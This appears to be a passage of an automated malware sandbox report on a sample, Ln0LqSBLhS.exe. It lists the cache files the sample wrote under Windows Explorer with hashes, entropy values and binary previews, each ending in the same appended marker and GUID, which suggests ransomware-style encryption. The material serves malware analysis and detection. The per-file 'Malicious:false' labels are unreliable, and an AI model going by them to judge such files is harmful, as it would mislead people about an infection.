                                                                                                                                                                                                    SSDEEP:384:FzQo3l8lTA4ifEYhfc671EECoh+RwmpGfs0sMJWv:Zhl8pA4i/hfn71EEtAwXftJ8v
                                                                                                                                                                                                    MD5:518D9C62E918DBEBDC25846531F40AEB
                                                                                                                                                                                                    SHA1:16D500635338DE56813CD151CAAE4A3448B42FAA
                                                                                                                                                                                                    SHA-256:481E4A7CA503208C543826E9814DC884F4C62DDF3D8D9F60AE5D6E0FD9A41345
                                                                                                                                                                                                    SHA-512:BDE63BAA983C7EA7F3AC3A2A3FF442F18B33C10718BDF9FFC46152A7FBC3DF35C4C9191CA156E50AB41DC5DCC920108ACB617AC974E17CFABF58002128E17214
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: O...=Z_..*J.}....-.u..W%b..u.a.z...<...XZ.....G^YC...d..qCl..F..19oJ..@..h.\'...T.]<.bE..6.8IB.A.-..w...r.\..m.~..z.8..T,..=....J.T.Ge=.p.V@....h.[.t.!N.,w.4..c.......o.y.\Ve.0.r9..c......Aj..V.5.....OR.1..x..^..J{.v/.6..,+.N.t.+kH.r).$. .M...!..z.......:...xV'.`.$......./.|..w.,U.a_..o.4..]@..2!...2.g...Zs..=.3....l.].ST....b.;....WB.|..#1d.v.S.qa'....V.o.cP.YA...<...!Z...T(..D...@.]....f.i..vE.KUn..W6N.n.:C.8.{....(.q Q.2.%."PB`..)..M.q,..W.JLH.r.8..oK..Pv`.. f..*....=......SQ.O.B..>.4....w....o..1..D.A|#.[ .....M.(.......+...\e..D.[.<*..N@.:.#.R'Y.LE..u......NZ.kH.Fs#..R}....._.b.....;......t..u..6_.B.k...k{...=..Of.AN.h.}g....T...|..K,(_..qQ*.<.m...uK...B]..W8..`.5.,.. ..3.Fq2....!..L..d..f ..T..pv......../.R...X#...?.s....m.mN.r...^Y.........g.7xz~>...A......E..t...PT7nF,r....M..C...bU.F.e.O{....Y+uv.J+....E...?.g..mb.............%.02.6..r..%.i......v.......ij..[@..<lQ6.X..e...?}].....'d.....L..HP.ba...ME0.uw9.<..A...T,...A.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.247637758710563
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:OXQxkOuwZiYA1hqajtzUFC7HltxbjmKN6wdGVrt7v3yaYyXoT0Bl75dExcii96Z:kEkOuGOhTz/7FtawdQv3ya2T0ocii9a
                                                                                                                                                                                                    MD5:237D7AB3E77993982DCC3094F09C20A6
                                                                                                                                                                                                    SHA1:EE1DEE3F339520B000ADEAD7EF1482355927B2ED
                                                                                                                                                                                                    SHA-256:DF4AED7EEE30F008E73EB99A5D9247B32C55A6C62DD0B33A9EA9E21339C163D8
                                                                                                                                                                                                    SHA-512:E82CF0928CB7081A7A21B793C142F099517ECE6E49AF5CB6EE2B3689A347A43B50591C2D6619E7DE6B1A75BEE4186691BFEB339B714A42317655602000C6413E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f@5...........R.0.....,.{..=:......"w..4..N-b...szRYm........r.@..7.D...t..%.5.e.:.+m..W..i.Q..^....20N.Z..|[&..q.f..*.*.GJ.....6(..<J....[..p.;...=h.B.>.Z....H.k..|.N.uO..J..P....t.A.......)1[..@1.gG...X.h...C"*..&\...0Vi.J.0..T....e..].U...2..B...Q.....Fr..8'5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.230377261843757
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:v9Vw/TplE1ZgKu9KKal9pnni/RNGqLJG4kJTSaTcASCEKhL2sMSP2Z2GXH75dExX:v9VN1Zef2Xip4qLUtAa41K92sMSPbGUX
                                                                                                                                                                                                    MD5:F2BB9732A79FA92A1FC4E787E0C3487E
                                                                                                                                                                                                    SHA1:44F6181214CC4E4A26401C719170DE55C816B491
                                                                                                                                                                                                    SHA-256:85C8082BEA624EBEEA13F41BC303C84986EEA1CA22142BCADE23074E9FC62B78
                                                                                                                                                                                                    SHA-512:C6693C09A56B4E5CE998B29F65F2146CD98FED1CE6F4177BC37C1931F8F08AFBDE28C6867AE21FC6E195548BB9DB0ACB48F2FE51B177406B140437799C23CEC4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....~]tj.Zg.,......Z..]....K9# .C.,......f\...>a:xrV.6....:.p.`.&a........|.E...H..F.o.`.......k...i..?9..7..pzC......".... .9..-..j.&.Rr...E...U(,w....[..g.a.l.,.8...v..\%..KH.O.C....|...#..m..w..........+....r.85F.F?.0...h.Ju...<t..7&.E#.F.'....4.Ii9Q.....+..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.218861874970469
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:ktRvOrAT5s6NtsUWQLu/euT8S/OaXA7BLpdzsEUY1SBwDe4Gp9zL75dExcii96Z:kRvjCN0Py8S/9mXzThSDxp6cii9a
                                                                                                                                                                                                    MD5:8C96BE8F87C18B5325AB213096C08D2A
                                                                                                                                                                                                    SHA1:71B92477949593416D7F3E15CC3DF4B8E6946B01
                                                                                                                                                                                                    SHA-256:63565AEC235D0B2F6763402BD90B843D55C21563FB6ECE43E156261B4DB0054F
                                                                                                                                                                                                    SHA-512:DB68EEB557E1E881ADDEA4F96E0C2EB39CEF1426319483AEFEA5F8D4EFAD7E4CDF079CEB25C70749DEBF3D4E46B62F523BAC4BF390F9372F176A7050959DDFBA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......v$-+x.BR.0.1.J}....ZM.l...=.......e....taR.....[.&|c.......1.&..AL..P9j0z[d...m..?.4.R...&...0..6..wL....1.zp.~.s..e.y.....0.. vZ.a.dT.........{6........lL`.l".apx.rA...)O%..l..=.SMf.K.lr......[+.-..(.."_.G..^l......8.R.e...idL}..3H.#@...8Z....~..{|'5....p.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.253532784198596
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:zChO2zD+tTXZ7Hi6xfgZb2n+HOD8vzrZhzXH75dExcii96Z:uhO22tTZ75Vgd2n+u4PZGcii9a
                                                                                                                                                                                                    MD5:B5FB8E349CAEC2E0AFCCBDB1726F6F99
                                                                                                                                                                                                    SHA1:EDD50639F7C6A118D4C4DD1FB3E04163D9097465
                                                                                                                                                                                                    SHA-256:72A770158788394F37E76572FD352CC6BDC07F7FDF647409E74EF2E825F828B3
                                                                                                                                                                                                    SHA-512:DA0D0A847867F51AC1E1495A2AA8F48FDF7FABC26DE8D2B323D6DC2848D9DE7E86B5681E29D34A7F6A0445F4725A2241AE505486F0CA75E4D88201BEAB1B29E6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..4....s.....+...9.R.F.v......H..0...fT....%;j..o.?...tJ>9K.N..I.p7\&"YX.L.+.D...)S..W^.g.EcJ+..8..z...<....C...xSk...o.c.Sw.U....Ys..W.[c._-.*..."...Be.4..p....U....|".1y...._.>{.7....l...?..R..+.....5...P...P$.f.S$.`.%.6.Q.Z..w..z.FI..Y.].O..f.h..C..!..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.255744452898672
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:w1QtMmibEU7ZEbJVm4xi0pP2urPQwuQELZxrSm7+mY+aQH75dExcii96Z:wtbxNEx8cP8QEtxrSLm1aQkcii9a
                                                                                                                                                                                                    MD5:B58C628A20FEC4E7CB584B84D562D980
                                                                                                                                                                                                    SHA1:C57912C4777A5D8156C366153CBB29471093C76C
                                                                                                                                                                                                    SHA-256:37ADD23AE34015E740D534102402673D294004E6100C5EEB4888053F915F6FA5
                                                                                                                                                                                                    SHA-512:CA165B2AA276AE017DCEA7E2C29F0F78C5AC30FCE49E2098CC8F46DDBC44934088222861825BA7AECA13F1DC2DE05F4907E031263B8374AC6801553A9CF631BC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: _.6NL.5...z6.._o.-]...&V.a...X..B....4..'kI..xoi. 7.;V|..2..I.'.CRj..F..........EM...l3.l.g.......H9.X.....}....W..Y.p....$.TS....'..$Q.....`pN?..>......=.}C#.~.....Qh.B......4.y.\........&..z.f.s.;(.8.'...... G..k....j..<.f..Y#.=.Y........Q_.S)^'............5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.228337733236609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:3xp0OxtSAc+d8QpxO4njPL4CXHwdF5DlJUczfi75dExcii96Z:3xao1lzHjDJXH47zUczPcii9a
                                                                                                                                                                                                    MD5:E660A5DD6DE7AB7A8ACEE60AF520E526
                                                                                                                                                                                                    SHA1:53F9C5A348839389E33876777C544975FF0CCA30
                                                                                                                                                                                                    SHA-256:4556737772DD0FAF6B3B52680943C1BC5193CD75754D11FD77B4A92CBA9DE6DD
                                                                                                                                                                                                    SHA-512:DDDF6E7D61BF2B35D930E4DAEBE30059A9C777ED5C4B572C8FF2EF1C9084F00F2A741B5BD650683EC33343777B7F0C8678D577D23C8150DB928E695121EFBAC0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .._.i...tkR..(,.....U..>GY<...+o.gG..L....S...&M.k.N.f...~..S'...f...x..V..<YV.,k..q..OF=.....cq.!.TC..Y.%f.4}K...\......i...)..nB.-=^.#...&...QO.k....m...j1.u...... .zS....~....@..,....;.;+C..^.56...?..bn..J7#t..Z|o.x........FC=y<..w&........b|.7)....L6[..KFd.:.[5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.228567036345031
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:PSpGksLMs3FWTXPdH22zYMEOchfUizlx04Uz9Qd5un0c4T0zA6CSiJHEl75dExcq:6pGVf1k5sMEOchJCj9QH64TIZifcii9a
                                                                                                                                                                                                    MD5:1250463B9DC1B044A820432AECBB2BB4
                                                                                                                                                                                                    SHA1:A82A72EFEFC863292D7139DDCDE63690B94EE8D2
                                                                                                                                                                                                    SHA-256:BD183E62BCF0620C03FAE358C4DA3967F44D5092C9AB55CE9F757C2FD9436B28
                                                                                                                                                                                                    SHA-512:2E238B3215AC4A9F4D214E959EF7ABFF1D5BDB16403FB7EAEF576D6BF1B761F8FFAC2043981334507102169E24942CA2581E5F73004F71882F650428B72B348E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 4 ...L...*5....!...a.H.g(......C..\ ..\..Q.5.K.....U.<B.j.G.fsg.P....^.s*h...0%{.........N.M...x!u...@I..N..M'..QX..i.J,?*..E.9.....2.~.a.d.m...fQ4...^..av....w.:....-4{..=J.tjd....2....5,.r I....Q....J.....p..?R..#.n.a.j&.q..l).S...M.*.\>.6.....,.....d..* ...."..t..h5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.242312572007322
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:LtM3MYerB9aNj3QQI1mULrhRCWfzODg7bJQRE74rRaXUcri75dExcii96Z:ZsMFrB4p3RI1mSrhX7bm274laXl7ciik
                                                                                                                                                                                                    MD5:70CD538E74B00F377D613B051C6712ED
                                                                                                                                                                                                    SHA1:24715BCB444D59D201D5F63E6903142A4FAFA744
                                                                                                                                                                                                    SHA-256:69C4685F8B9D6D4115D10A6AC7872DC9C92DD40B8FF8911DD4B810EAB4D944FC
                                                                                                                                                                                                    SHA-512:C8C0142799CE9C76636AB70967A776426540DF103BB94CD6AE3FB98210206CBDE17B6046ED69AFC4952977505B37843F1F84009AF49AD987E1F55AE36732D0F2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......k...m*WR.}.9.k..J...).=.>..[F.K.D9.....-.O.....^..z9.6...........A..".<.N..4............p...rc..y.+....B.....9x}.}.....5....P..Y:4.q@..X...`jdnwI&..O..!.~.......><d.-..R+..g.e`..`.R.6_..k..9.0...;R.y.F..r.,.,V....OU.....%P...".}._[Hi.G.....P....]RA.6.n.ye5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.210812343797869
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:scpJOZES84WkuphhlwS5LZ/DwUCqeRWc+3+87p3Y8PPno3lGJD75dExcii96Z:1MB84juLvwSlOUZK+Oao8PPojcii9a
                                                                                                                                                                                                    MD5:7CE6A80582CF09BE148BFADFC58B8C0F
                                                                                                                                                                                                    SHA1:97AC5798FFD5D7C2F6A4BD877D60652ABFD368CA
                                                                                                                                                                                                    SHA-256:499CA4BFB5B020153D27E7DB4F517B136E382C0268C9E0843C579E0FC367D345
                                                                                                                                                                                                    SHA-512:ABF6363D684875B221894E93D7E3AB0EDB79C55ED3044938A339E744FFD619061916715C6FA1A90185EBE73529D1E999DB7498B5053081A5359BC78D7D01FC18
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...S^....B.-P....G..|..0*.PJ*...a#...nM(.h..a.A`...^....w..F'...*..=9d........!......`.D_..\..1.y.F...O..-.IQ1....u1..?z.qc#...C...rF.c...9..%`.;...:\.....h.3y..VU.(4.TjNH....k.p_=.{G.N.....}....Qr...y*.y..vb.kY[th.7a..;l.H..?T.1......i#.j...j#7...x..T.+..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.288935433127205
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:2df7ySjchSj6G58QulnMR6kym65CF+BBG/542m75dExcii96Z:Uf7yqam6GWMR6bRcwMdcii9a
                                                                                                                                                                                                    MD5:B81235F5144A6E34C50BA1532207B4FA
                                                                                                                                                                                                    SHA1:95363EBE39319D6B4DFFBC099A60B761C3509DC5
                                                                                                                                                                                                    SHA-256:F868001E263CF037B6EAC9B1554DA7584DFC3FDCB8654AC80A3D9CDA8D05451B
                                                                                                                                                                                                    SHA-512:4DAA853183AFB731DE9EEFFE7C027DA71E9E8913CC6A2331B23D54194B948057D72617077FD5289D301BEF773E2E90E76C07958C2314292B7B67FA181B971D02
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |H.....&..]...6!..t....,"A.....U..}...Z...Z]..M.........Ov/n...q....+r...S.......*c.w.?..w.q..aH.:...Z.*..B.[....d2e....Q?q..M'.'H..G{..b.W..]j.P.}*n..k..t.?.;.4.J..0.*..%.....j.hQ...7E..H^.0^....o....u.JF$..Y].....S...5M..9.]7T............s.gJ}-.3..E(|N0)E..98......!..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.199021825175427
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:aLLUDkLOXt9SQxgKUV67PFVpsOpAl382Pd0TGqpmizJhO81MQD75dExcii96Z:mLUwLmDSQuKU8PFVDAW2Rqpmmwcii9a
                                                                                                                                                                                                    MD5:BC6A6D0DB517744908C03C15CE1F4188
                                                                                                                                                                                                    SHA1:071E3AD9E46C0E3360DF60174D0290463D69F30E
                                                                                                                                                                                                    SHA-256:3E6ADD917034D465733B19B6FAABEDDBA124BE49F17529BC8E4B555914C9727B
                                                                                                                                                                                                    SHA-512:88F474209CDCCD146E4A3D642954E531A8C4325E6E614DE0ADBEC962CA79075F0A48CC9F4D2EE1FCF90362FA3A178FAF0059D535BE01949897DE9E94BE96300D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..-...!9.vL[...4...[...bt.F....@E.\. g..>.X..K..eE%.>.F.F..^[`o._T.O......]..mV;.OJ.EIhM.z@ .#.>G5.......t...,.}B^....,.......U...g..Y.t.+....{..0.S....+4..%..^..?..M../KV...ez2.X.|..&.!.3.R.V.y....v..a.....?.sJ"....9i.X.4QD.|...e.. ..z....N.L'.....>.2.8.I_...L......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.302852641236031
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:7F7LFa62Ozu91ObtOZGhQB+J5AYiIRE9r5aCH2K75dExcii96Z:hJ+cuXOBhhQB+veIC7aCWPcii9a
                                                                                                                                                                                                    MD5:384D39ACFCA240D015005B9D834DC057
                                                                                                                                                                                                    SHA1:FEF4C0CB1BD948624441510AB92AA7C09673A7D3
                                                                                                                                                                                                    SHA-256:C04E7608D823C64A08F21919F8A3DE4835F9DCFCF6DA053611B939A3CEAF661F
                                                                                                                                                                                                    SHA-512:68A7DF74C9B306B1B9524088B72FE85740DB0B5AE69E85A6EC68F384BB2126B8DBD0CD58E586A65200B5D64A01AA4A45A794CF191D7BEE2D08D707B1EAC05E8F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: r..|u...*V......%..yB..x.AV..).S8.g..T...j[.,....5..ek.f..... (.~.y.....#....vCP.)X..O.!J....~*....Q#.\...E;.MlA..S.....r..^p02...n1.kD....T@..VY..<.k3..y.,*[Z.....+.l.%W%.@..R....;.....k@09VQM`..f.V."...y^.Z..p......).x..g.....5..#..^.....(.....%b..C._..Kqn.W.G5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.25823172099428
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:0qjkHCbWFMeyjDJgYCpjXRlp+5KiXpToV/ck6yzk0fdx4FCl75dExcii96Z:0qjkHC6FSjDe5XA5KupTof670fz4dciD
                                                                                                                                                                                                    MD5:F0CAC1B001CF313A2C88B1368CB7D9E2
                                                                                                                                                                                                    SHA1:93B4E988A1DE31750C00388329EF16FB1AE5A369
                                                                                                                                                                                                    SHA-256:F162D66A5FBFF148EE505A00C2EC5625A2E74E6520321670AA1008A4982FC22F
                                                                                                                                                                                                    SHA-512:E300CF648C6B6ADEB50B5BB54C2FB7DAC0AB890B139A459C1E34803154EFB7A00BB85A7E2FB3A8DC311A4E6408F5C169806BB518B171178C61ED7CE5B39B1C51
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: <...D*'..n.m.2.r!S$...%..P.........Gu....O4.....'..5..x{..3..)......%G....QU...$.T.0|.G.....N..R....2.zj......TZ...............jX.e../v0/.?.=.#..#.Gw.v...'R=8.4...-c..!.Rd.....`^w.mm.x_.V.?..-...5.z.......i......#'$.2.Mz...=g.....y.k..s..o.J...}..=.M"%.F>...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.245097356355288
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:UyPBGeIvwKUHmM6uTO5VGkz2EGo1aDRWTSN/FKkFfVDFH6fi75dExcii96Z:UqBSwKKFKr/zjttK13DFHkcii9a
                                                                                                                                                                                                    MD5:A36C8D7BE2D382C02674EC4FCCA22B1E
                                                                                                                                                                                                    SHA1:F89A6CDA7573973AF2F9DAF07FB0436680DFE689
                                                                                                                                                                                                    SHA-256:B21C843FDA1D75A4BD6541131F566A9EC13FDEC04EB9CA72EF23EF56F0AC3B15
                                                                                                                                                                                                    SHA-512:38370F667ADA911F5986895375ABCFF3FAF96A97F01F7E8294CA815A17200EE57CA691B181C4DCBD2F3D8A5CB378934C96B02A3D3DF6863F9D99A0A44D4B2DD0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +.5....5...%..s.fy]....{^.w..fd..\..A..w3.;#,?.fQ...%.-.2..$.:..eC..[E..2.F.@..,...."......B.$I....(.J......56..[.....bQ.0a..A..y..?.bx...~.....F...FlT|(.j.&.)....,.a...p8U.j..!T...@1....E.HF..gu....7.b.Z]:.K...l...O.!=...^.M.\Ye....6>...TV.5.K.?...L..N?.~e5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.233675189607391
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:32n0QkT1m9YPnW9BBNBEr2CDesiIoT3G6Riu+ashWel5nX5sD75dExcii96Z:32n0bT1m90eNBC2CEf7zR1+asA6JJciD
                                                                                                                                                                                                    MD5:680328DB4FBC08695A977A964297D068
                                                                                                                                                                                                    SHA1:C9D854436024AE6B922A9279D0E0F4A6AC586958
                                                                                                                                                                                                    SHA-256:3ABB58888B8050AACAA8B5DD62A0144D0F5D66E0BCEA2196B539C1A9432B483A
                                                                                                                                                                                                    SHA-512:ECDF25323693CD959E92C6DDC336FE55E784BFFFC9FCA1DDD18377C48FDF0D75BC0A9EEED3CF06FB040C417049649288BD23A4B41EE0056DE34A234BB35FD7E6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ~l....W..p.n........wZ6.D..6pN.k....[..jG..>......aT4.n..Y.P4...8...).f.`.Y.R#=hc%H...!..mW.....:N...ua............H...R:..o..cT.z...I.Yk../<..w.h.....1.K....i.f..n....D..M.q.#\*..M..w.0.3.E......;........"../>`..~..jEw9#->..;.xPo~\..7*.ls.i.DX7..bF.sI3G%I.....}...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):353
                                                                                                                                                                                                    Entropy (8bit):7.182254428791429
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:zH5u7CYbWkCDytxGj2Uea4pEn2OibyQ7h5jjo5Y5Sr8cc4QjE1l75dExcii96Z:uCmnK2ratXAqY5SIckjcucii9a
                                                                                                                                                                                                    MD5:C2B3A78A9C398D0EEFFB215B3A4A5A8A
                                                                                                                                                                                                    SHA1:E791E746B9635ACB14F95B57D55EA374B66CDD1B
                                                                                                                                                                                                    SHA-256:03C7A27FE014828662F7A2E75A2406798E6DA5B76BB0893DD64700FAD421F4E6
                                                                                                                                                                                                    SHA-512:F60C3E0AF8FB4E2F3FC5BEA9BB6AECFF106DA367414AF054DFD5613E936C46A234EDCAD66BF75380C9763231D363FA23DE0C2CCCF089908D6EAFEEC901EDE460
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
